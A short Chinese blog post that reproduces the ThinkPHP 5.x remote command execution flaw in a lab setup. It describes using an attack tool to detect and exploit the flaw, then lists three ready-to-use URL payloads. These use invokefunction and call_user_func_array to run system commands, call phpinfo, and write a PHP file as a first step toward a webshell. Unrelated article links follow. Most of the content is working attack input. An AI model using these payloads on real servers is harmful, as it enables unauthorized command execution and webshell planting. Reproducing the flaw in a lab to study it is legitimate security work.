当前位置: 首页 > article >正文

thinkphp漏洞再现

Thinkphp5x远程命令执行及getshell

1、开环境

2、使用工具攻击

开启工具

输入地址,点击漏洞检测

存在漏洞之后,选择漏洞,执行命令

3、也可以执行远程命令

执行命令

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>1.php


http://www.kler.cn/a/612731.html

相关文章:

  • 《C++ 基石:筑牢编程巅峰根基》
  • Dynamic WallPaper-壁纸动态-Mac电脑-4K超高清
  • node-red
  • Ant Design Vue 中的table表格高度塌陷,造成行与行不齐的问题
  • 日记:实际开发中git的常用命令
  • 搭建私人对外git空间
  • 详细介绍Spring MVC的执行流程是怎么样的?
  • 基于物联网的新房甲醛浓度监测系统的设计(论文+源码)
  • 阿里云数据学习20250327
  • Unity 运行时更换Animator状态里的动画剪辑
  • SpringBoot集成kafka极简教程
  • 第4.1节:使用正则表达式
  • vue中使用threejs的加载纹理没有效果
  • 自定义minshell
  • Sa-Token核心功能解剖二( Session会话、 持久层Redis扩展 、全局侦听器 、全局过滤器、多账号体系认证、单点登录)
  • UniApp和微信小程序中v-switch夜间模式动画开关
  • Vulnhub:Digitalword.local: FALL靶机渗透
  • 【科研绘图系列】R语言绘制PCA与变量的相关性散点图(scatter plot)
  • Git回退文件到指定提交
  • C++多线程编程简介